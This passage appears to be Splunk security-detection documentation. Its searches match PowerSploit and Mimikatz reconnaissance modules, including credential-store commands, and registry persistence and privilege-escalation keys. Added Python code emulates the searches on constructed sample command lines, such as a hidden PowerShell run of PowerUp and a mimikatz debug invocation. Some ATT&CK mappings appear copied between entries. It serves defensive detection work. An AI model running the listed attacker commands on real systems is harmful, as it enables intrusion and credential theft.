| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Get-DomainSID/)=true OR match_regex(cmd_line, /(?i)Get-DomainSite/)=true OR match_regex(cmd_line, /(?i)Get-NetSite/)=true OR match_regex(cmd_line, /(?i)Get-DomainSubnet/)=true OR match_regex(cmd_line, /(?i)Get-NetSubnet/)=true OR match_regex(cmd_line, /(?i)Get-DomainTrust/)=true OR match_regex(cmd_line, /(?i)Get-NetDomainTrust/)=true OR match_regex(cmd_line, /(?i)Get-DomainTrustMapping/)=true OR match_regex(cmd_line, /(?i)Invoke-MapDomainTrust/)=true OR match_regex(cmd_line, /(?i)Get-Forest/)=true OR match_regex(cmd_line, /(?i)Get-NetForest/)=true OR match_regex(cmd_line, /(?i)Get-ForestDomain/)=true OR match_regex(cmd_line, /(?i)Get-NetForestDomain/)=true OR match_regex(cmd_line, /(?i)Get-ForestGlobalCatalog/)=true OR match_regex(cmd_line, /(?i)Get-NetForestCatalog/)=true OR match_regex(cmd_line, /(?i)Get-ForestTrust/)=true OR match_regex(cmd_line, /(?i)Get-NetForestTrust/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1199 | Trusted Relationship | Initial Access
T1482 | Domain Trust Discovery | Discovery
T1590 | Gather Victim Network Information | Reconnaissance
T1591 | Gather Victim Org Information | Reconnaissance
T1595 | Active Scanning | Reconnaissance


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to computers and domains via powersploit modules

This detection identifies access to PowerSploit modules that discover computers, servers and domains that can be accessed or taken over.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1592, T1590, T1087
  • Last Updated: 2020-11-06

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Get-ComputerDetail/)=true OR match_regex(cmd_line, /(?i)Get-Domain/)=true OR match_regex(cmd_line, /(?i)Get-NetDomain/)=true OR match_regex(cmd_line, /(?i)Get-DomainComputer/)=true OR match_regex(cmd_line, /(?i)Get-NetComputer/)=true OR match_regex(cmd_line, /(?i)Get-DomainController/)=true OR match_regex(cmd_line, /(?i)Get-NetDomainController/)=true OR match_regex(cmd_line, /(?i)Get-DomainFileServer/)=true OR match_regex(cmd_line, /(?i)Get-NetFileServer/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1592 | Gather Victim Host Information | Reconnaissance
T1590 | Gather Victim Network Information | Reconnaissance
T1087 | Account Discovery | Discovery


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to computers via mimikatz modules

This detection identifies use of Mimikatz modules for discovery of computers and servers and access to them.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1592
  • Last Updated: 2020-11-06

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)net::ServerInfo/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1592 | Gather Victim Host Information | Reconnaissance


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to operating system elements via powersploit modules

This detection identifies access to PowerSploit modules that discover and access operating system elements, such as processes, services, registry locations, security packages and files.

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Find-DomainProcess/)=true OR match_regex(cmd_line, /(?i)Invoke-ProcessHunter/)=true OR match_regex(cmd_line, /(?i)Get-ServiceDetail/)=true OR match_regex(cmd_line, /(?i)Get-WMIProcess/)=true OR match_regex(cmd_line, /(?i)Get-NetProcess/)=true OR match_regex(cmd_line, /(?i)Get-SecurityPackage/)=true OR match_regex(cmd_line, /(?i)Find-DomainObjectPropertyOutlier/)=true OR match_regex(cmd_line, /(?i)Get-DomainObject/)=true OR match_regex(cmd_line, /(?i)Get-ADObject/)=true OR match_regex(cmd_line, /(?i)Get-WMIRegMountedDrive/)=true OR match_regex(cmd_line, /(?i)Get-RegistryMountedDrive/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1007 | System Service Discovery | Discovery
T1012 | Query Registry | Discovery
T1046 | Network Service Scanning | Discovery
T1047 | Windows Management Instrumentation | Execution
T1057 | Process Discovery | Discovery
T1083 | File and Directory Discovery | Discovery
T1518 | Software Discovery | Discovery
T1592.002 | Software | Reconnaissance


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to processes and services via mimikatz modules

This detection identifies use of Mimikatz modules for discovery and access to services and processes.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1007, T1046, T1057
  • Last Updated: 2020-11-06

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)process::list/)=true OR match_regex(cmd_line, /(?i)service::list/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1007 | System Service Discovery | Discovery
T1046 | Network Service Scanning | Discovery
T1057 | Process Discovery | Discovery


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to shared resources via mimikatz modules

This detection identifies use of Mimikatz modules for discovery and access to network shares.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1021.002, T1135, T1039
  • Last Updated: 2020-11-06

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)net::share/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1021.002 | SMB/Windows Admin Shares | Lateral Movement
T1135 | Network Share Discovery | Discovery
T1039 | Data from Network Shared Drive | Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to shared resources via powersploit modules

This detection identifies access to PowerSploit modules that discover and access network and distributed file system shares.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1021.002, T1135, T1039
  • Last Updated: 2020-11-06

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Find-DomainShare/)=true OR match_regex(cmd_line, /(?i)Invoke-ShareFinder/)=true OR match_regex(cmd_line, /(?i)Find-InterestingDomainShareFile/)=true OR match_regex(cmd_line, /(?i)Invoke-FileFinder/)=true OR match_regex(cmd_line, /(?i)Find-InterestingFile/)=true OR match_regex(cmd_line, /(?i)Get-DomainDFSShare/)=true OR match_regex(cmd_line, /(?i)Get-DFSshare/)=true OR match_regex(cmd_line, /(?i)Get-NetShare/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1021.002 | SMB/Windows Admin Shares | Lateral Movement
T1135 | Network Share Discovery | Discovery
T1039 | Data from Network Shared Drive | Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance of access and persistence opportunities via powersploit modules

This detection identifies use of PowerSploit modules that discover opportunities for malicious access and persistence. Some examples include access to admin accounts, weak access control policies, landing paths for dropping malicious software or data to exfiltrate, registry locations to land autorun parameters, task scheduling opportunities, as well as services and system files that can be compromised.

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Find-LocalAdminAccess/)=true OR match_regex(cmd_line, /(?i)Find-InterestingDomainAcl/)=true OR match_regex(cmd_line, /(?i)Invoke-ACLScanner/)=true OR match_regex(cmd_line, /(?i)Find-PathDLLHijack/)=true OR match_regex(cmd_line, /(?i)Find-ProcessDLLHijack/)=true OR match_regex(cmd_line, /(?i)Get-DomainObjectAcl/)=true OR match_regex(cmd_line, /(?i)Get-ObjectAcl/)=true OR match_regex(cmd_line, /(?i)Get-DomainPolicy/)=true OR match_regex(cmd_line, /(?i)Get-ModifiablePath/)=true OR match_regex(cmd_line, /(?i)Get-ModifiableRegistryAutoRun/)=true OR match_regex(cmd_line, /(?i)Get-ModifiableScheduledTaskFile/)=true OR match_regex(cmd_line, /(?i)Get-ModifiableService/)=true OR match_regex(cmd_line, /(?i)Get-ModifiableServiceFile/)=true OR match_regex(cmd_line, /(?i)Get-PathAcl/)=true OR match_regex(cmd_line, /(?i)Get-UnattendedInstallFile/)=true OR match_regex(cmd_line, /(?i)Get-UnquotedService/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1053 | Scheduled Task/Job | Execution, Persistence, Privilege Escalation
T1068 | Exploitation for Privilege Escalation | Privilege Escalation
T1078 | Valid Accounts | Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1543 | Create or Modify System Process | Persistence, Privilege Escalation
T1547 | Boot or Logon Autostart Execution | Persistence, Privilege Escalation
T1574 | Hijack Execution Flow | Defense Evasion, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance of connectivity via powersploit modules

This detection identifies access to PowerSploit modules for reconnaissance of connectivity.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1021.002, T1135, T1039
  • Last Updated: 2020-11-06

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Get-DomainDNSRecord/)=true OR match_regex(cmd_line, /(?i)Get-DNSRecord/)=true OR match_regex(cmd_line, /(?i)Get-DomainDNSZone/)=true OR match_regex(cmd_line, /(?i)Get-DNSZone/)=true OR match_regex(cmd_line, /(?i)Invoke-ReverseDnsLookup/)=true OR match_regex(cmd_line, /(?i)Get-WMIRegCachedRDPConnection/)=true OR match_regex(cmd_line, /(?i)Get-CachedRDPConnection/)=true OR match_regex(cmd_line, /(?i)Get-WMIRegProxy/)=true OR match_regex(cmd_line, /(?i)Get-Proxy/)=true OR match_regex(cmd_line, /(?i)Invoke-Portscan/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1021.002 | SMB/Windows Admin Shares | Lateral Movement
T1135 | Network Share Discovery | Discovery
T1039 | Data from Network Shared Drive | Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance of credential stores and services via mimikatz modules

This detection identifies reconnaissance of credential stores and use of CryptoAPI services by Mimikatz modules.

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)crypto::capi/)=true OR match_regex(cmd_line, /(?i)crypto::cng/)=true OR match_regex(cmd_line, /(?i)crypto::providers/)=true OR match_regex(cmd_line, /(?i)crypto::stores/)=true OR match_regex(cmd_line, /(?i)crypto::sc/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1589.001 | Credentials | Reconnaissance
T1590.001 | Domain Properties | Reconnaissance
T1590.003 | Network Trust Dependencies | Reconnaissance
T1068 | Exploitation for Privilege Escalation | Privilege Escalation
T1078 | Valid Accounts | Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1098 | Account Manipulation | Persistence


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance of defensive tools via powersploit modules

This detection identifies use of PowerSploit modules that assess whether defensive tools are present.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1595.002, T1592.002
  • Last Updated: 2020-11-05

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Find-AVSignature/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1595.002 | Vulnerability Scanning | Reconnaissance
T1592.002 | Software | Reconnaissance


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance of privilege escalation opportunities via powersploit modules

This detection identifies use of PowerSploit modules that assess privilege escalation opportunities.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1068, T1078, T1098
  • Last Updated: 2020-11-05

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Invoke-PrivescAudit/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including event ID 4688 with command line logging enabled.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID | Technique | Tactic
T1068 | Exploitation for Privilege Escalation | Privilege Escalation
T1078 | Valid Accounts | Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1098 | Account Manipulation | Persistence


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance of process or service hijacking opportunities via mimikatz modules

This detection identifies use of Mimikatz modules for discovery of process or service hijacking opportunities via Microsoft Detours compatibility. Microsoft Detours is an open-source library for intercepting, monitoring and instrumenting binary functions on Microsoft Windows. Detours intercepts Win32 functions by rewriting the in-memory code of target functions. The Detours package also contains utilities to attach arbitrary DLLs and data segments, called payloads, to any Win32 binary.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1543, T1055, T1574
  • Last Updated: 2020-11-05

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)misc::detours/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from the devices of interest, including event ID 4688 with command-line logging enabled (the audit policy "Include command line in process creation events"). Without it, the `process` field holds only the executable path and the regular expression cannot match.
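
As an added illustration, not code shipped with Splunk Security Content, the following Python emulates what the two SSA searches on this page (the Invoke-PrivescAudit search and the misc::detours search) do with a 4688-derived event: it drops events that carry no command line, applies the same case-insensitive patterns, and emits the entities (dest_user_id, dest_device_id) the searches report. The events, host names and user names are constructed for the example. The fourth record shows the coverage gap the paragraph above describes: with command-line auditing off, the process field holds only the image path, so the detection cannot fire, and a small coverage check lists such hosts.

```python
import re

# Constructed events shaped like the SSA input map (not real telemetry).
# Field names follow the "Required field" list: _time, process,
# dest_device_id, dest_user_id.
SAMPLE_EVENTS = [
    {"_time": "1604571600",
     "process": "powershell.exe -nop -w hidden -c \"Import-Module .\\PowerUp.ps1; Invoke-PrivescAudit\"",
     "dest_device_id": "ws-017", "dest_user_id": "ACME\\jdoe"},
    {"_time": "1604571605",
     "process": "mimikatz.exe \"privilege::debug\" \"MISC::Detours\" exit",
     "dest_device_id": "ws-017", "dest_user_id": "ACME\\jdoe"},
    {"_time": "1604571610",
     "process": "powershell.exe -Command Get-Process",
     "dest_device_id": "ws-018", "dest_user_id": "ACME\\svc_backup"},
    # Command-line auditing disabled on this host: only the image path is
    # logged, so nothing here can match even if Invoke-PrivescAudit ran.
    {"_time": "1604571615",
     "process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "dest_device_id": "ws-019", "dest_user_id": "ACME\\jdoe"},
    # Event with no process field at all (dropped by 'cmd_line != null').
    {"_time": "1604571620", "process": None,
     "dest_device_id": "ws-020", "dest_user_id": "ACME\\jdoe"},
]

# The patterns the two searches use, compiled with re.IGNORECASE to mirror
# the (?i) flag inside match_regex().
PATTERNS = {
    "powershell_privesc_audit": re.compile(r"Invoke-PrivescAudit", re.IGNORECASE),
    "mimikatz_detours_recon": re.compile(r"misc::detours", re.IGNORECASE),
}


def detect(events, patterns=PATTERNS):
    """Return one detected-event dict per (event, pattern) hit, carrying the
    same start/end time and entity list the SSA searches write out."""
    detected = []
    for ev in events:
        cmd_line = ev.get("process")
        if cmd_line is None:                 # where cmd_line != null
            continue
        for name, pattern in patterns.items():
            if pattern.search(cmd_line):
                ts = int(ev["_time"])
                detected.append({
                    "detection": name,
                    "start_time": ts,
                    "end_time": ts,
                    "entities": [ev.get("dest_user_id"), ev.get("dest_device_id")],
                    "cmd_line": cmd_line,
                })
    return detected


def hosts_without_command_line(events):
    """Coverage check: hosts whose process field is only an image path,
    i.e. where command-line logging is not in effect.  Heuristic: a full
    path ending in .exe with nothing after it."""
    bare = re.compile(r'^[A-Za-z]:\\[^\s"]*\.exe$', re.IGNORECASE)
    return sorted({ev["dest_device_id"] for ev in events
                   if ev.get("process") and bare.match(ev["process"])})


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["detection"], hit["entities"], hit["cmd_line"])
    print("hosts without command-line logging:", hosts_without_command_line(SAMPLE_EVENTS))
```

Run it against a day of real 4688 events exported from Splunk and the second function doubles as a quick audit of which hosts still need the command-line audit policy.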

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1543 Create or Modify System Process Persistence, Privilege Escalation
T1055 Process Injection Defense Evasion, Privilege Escalation
T1574 Hijack Execution Flow Defense Evasion, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reg exe manipulating windows services registry keys

The search looks for reg.exe modifying registry keys that define Windows services and their configurations.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1574.011
  • Last Updated: 2020-11-26

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process_name) as process_name values(Processes.parent_process_name) as parent_process_name values(Processes.user) as user FROM datamodel=Endpoint.Processes where Processes.process_name=reg.exe Processes.process=*reg* Processes.process=*add* Processes.process=*Services* by Processes.process_id Processes.dest Processes.process | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `reg_exe_manipulating_windows_services_registry_keys_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts, including the full command line, to populate the Processes node of the Endpoint data model; the search matches reg.exe command lines that add values under Services keys rather than reading the Registry node. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon (event ID 1) or Windows Security event ID 4688 with command-line logging enabled.

Required field

ATT&CK

ID Technique Tactic
T1574.011 Services Registry Permissions Weakness Defense Evasion, Persistence, Privilege Escalation


Kill Chain Phase

  • Installation


Known False Positives

It is unusual for a service to be created or modified by directly manipulating the registry. However, there may be legitimate instances of this behavior. It is important to validate and investigate, as appropriate.

Reference

Test Dataset


version: 5


Registry keys used for persistence

The search looks for modifications to registry keys that can be used to launch an application or service at system startup.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1547.001
  • Last Updated: 2020-11-27

Search

| tstats `security_content_summariesonly` count values(Registry.registry_key_name) as registry_key_name values(Registry.registry_path) as registry_path min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path=*currentversion\\run* OR Registry.registry_path=*currentVersion\\Windows\\Appinit_Dlls* OR Registry.registry_path=*CurrentVersion\\Winlogon\\Shell* OR Registry.registry_path=*CurrentVersion\\Winlogon\\Userinit* OR Registry.registry_path=*CurrentVersion\\Winlogon\\VmApplet* OR Registry.registry_path=*currentversion\\policies\\explorer\\run* OR Registry.registry_path=*currentversion\\runservices* OR Registry.registry_path=*\\CurrentControlSet\\Control\\Lsa\\* OR Registry.registry_path="*Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options*" OR Registry.registry_path=HKLM\\SOFTWARE\\Microsoft\\Netsh\\*) by Registry.dest Registry.user | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `registry_keys_used_for_persistence_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the Registry node of the Endpoint data model. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon (registry event IDs 12, 13 and 14). The data used for this search is typically generated via logs that report reads and writes to the registry.

Required field

ATT&CK

ID Technique Tactic
T1547.001 Registry Run Keys / Startup Folder Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

There are many legitimate applications that must execute on system startup and will use these registry keys to accomplish that task.

Reference

Test Dataset


version: 5


Registry keys used for privilege escalation

This search looks for modifications to registry keys that can be used to elevate privileges. The registry keys under "Image File Execution Options" are used to intercept calls to an executable and can be used to attach malicious binaries to benign system binaries.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1546.012
  • Last Updated: 2020-11-27

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path="*Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options*") AND (Registry.registry_key_name=GlobalFlag OR Registry.registry_key_name=Debugger) by Registry.dest Registry.user Registry.registry_path Registry.registry_key_name | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `registry_keys_used_for_privilege_escalation_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the Registry node of the Endpoint data model; both registry_path and registry_key_name must be populated, since the search keys on the GlobalFlag and Debugger names. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon (registry event IDs 12, 13 and 14). The data used for this search is typically generated via logs that report reads and writes to the registry.

Required field

ATT&CK

ID Technique Tactic
T1546.012 Image File Execution Options Injection Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Debuggers and troubleshooting tools write these values legitimately: GFlags (gflags.exe) sets GlobalFlag under Image File Execution Options, and a developer attaching a debugger to an application at launch sets Debugger. Validate the writing process and the value's contents before escalating.

Reference


Test Dataset


version: 4


Registry keys for creating shim databases

This search looks for registry activity associated with application compatibility shims, which can be leveraged by attackers for various nefarious purposes.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1546.011
  • Last Updated: 2020-11-26

Search

| tstats `security_content_summariesonly` count values(Registry.registry_key_name) as registry_key_name min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path=*CurrentVersion\\AppCompatFlags\\Custom* OR Registry.registry_path=*CurrentVersion\\AppCompatFlags\\InstalledSDB* by Registry.dest Registry.user | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `registry_keys_for_creating_shim_databases_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the Registry node of the Endpoint data model. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry.
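
As an added example that is not part of Splunk Security Content, the Python below reproduces the matching that the three Registry-node searches on this page perform (the persistence-key search, the Image File Execution Options search keyed on GlobalFlag and Debugger, and this shim-database search), so the path patterns can be checked against sample registry paths before the searches go live. The path patterns follow those searches, written with single backslashes since SPL's `\\` denotes one backslash, with a leading wildcard on every pattern meant to match inside a full hive path. The registry events are constructed, and case-insensitive matching is assumed, which is what the mixed-case patterns in the searches rely on.

```python
import re


def spl_wildcard_to_regex(pattern):
    """Translate an SPL wildcard pattern (only '*' is special) into an
    anchored, case-insensitive regex.  Because the result is anchored, a
    pattern with no leading '*' only matches paths that START with that
    text, so anything meant to hit a full HKLM\\... path needs the leading
    wildcard."""
    body = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.compile("^" + body + "$", re.IGNORECASE)


# Patterns taken from the three searches.  key_names, where present, mirrors
# the registry_key_name condition (IFEO: GlobalFlag or Debugger).
DETECTIONS = {
    "registry_keys_used_for_persistence": {
        "paths": [
            r"*currentversion\run*",
            r"*currentVersion\Windows\Appinit_Dlls*",
            r"*CurrentVersion\Winlogon\Shell*",
            r"*CurrentVersion\Winlogon\Userinit*",
            r"*CurrentVersion\Winlogon\VmApplet*",
            r"*currentversion\policies\explorer\run*",
            r"*currentversion\runservices*",
            r"*\CurrentControlSet\Control\Lsa\*",
            r"*Microsoft\Windows NT\CurrentVersion\Image File Execution Options*",
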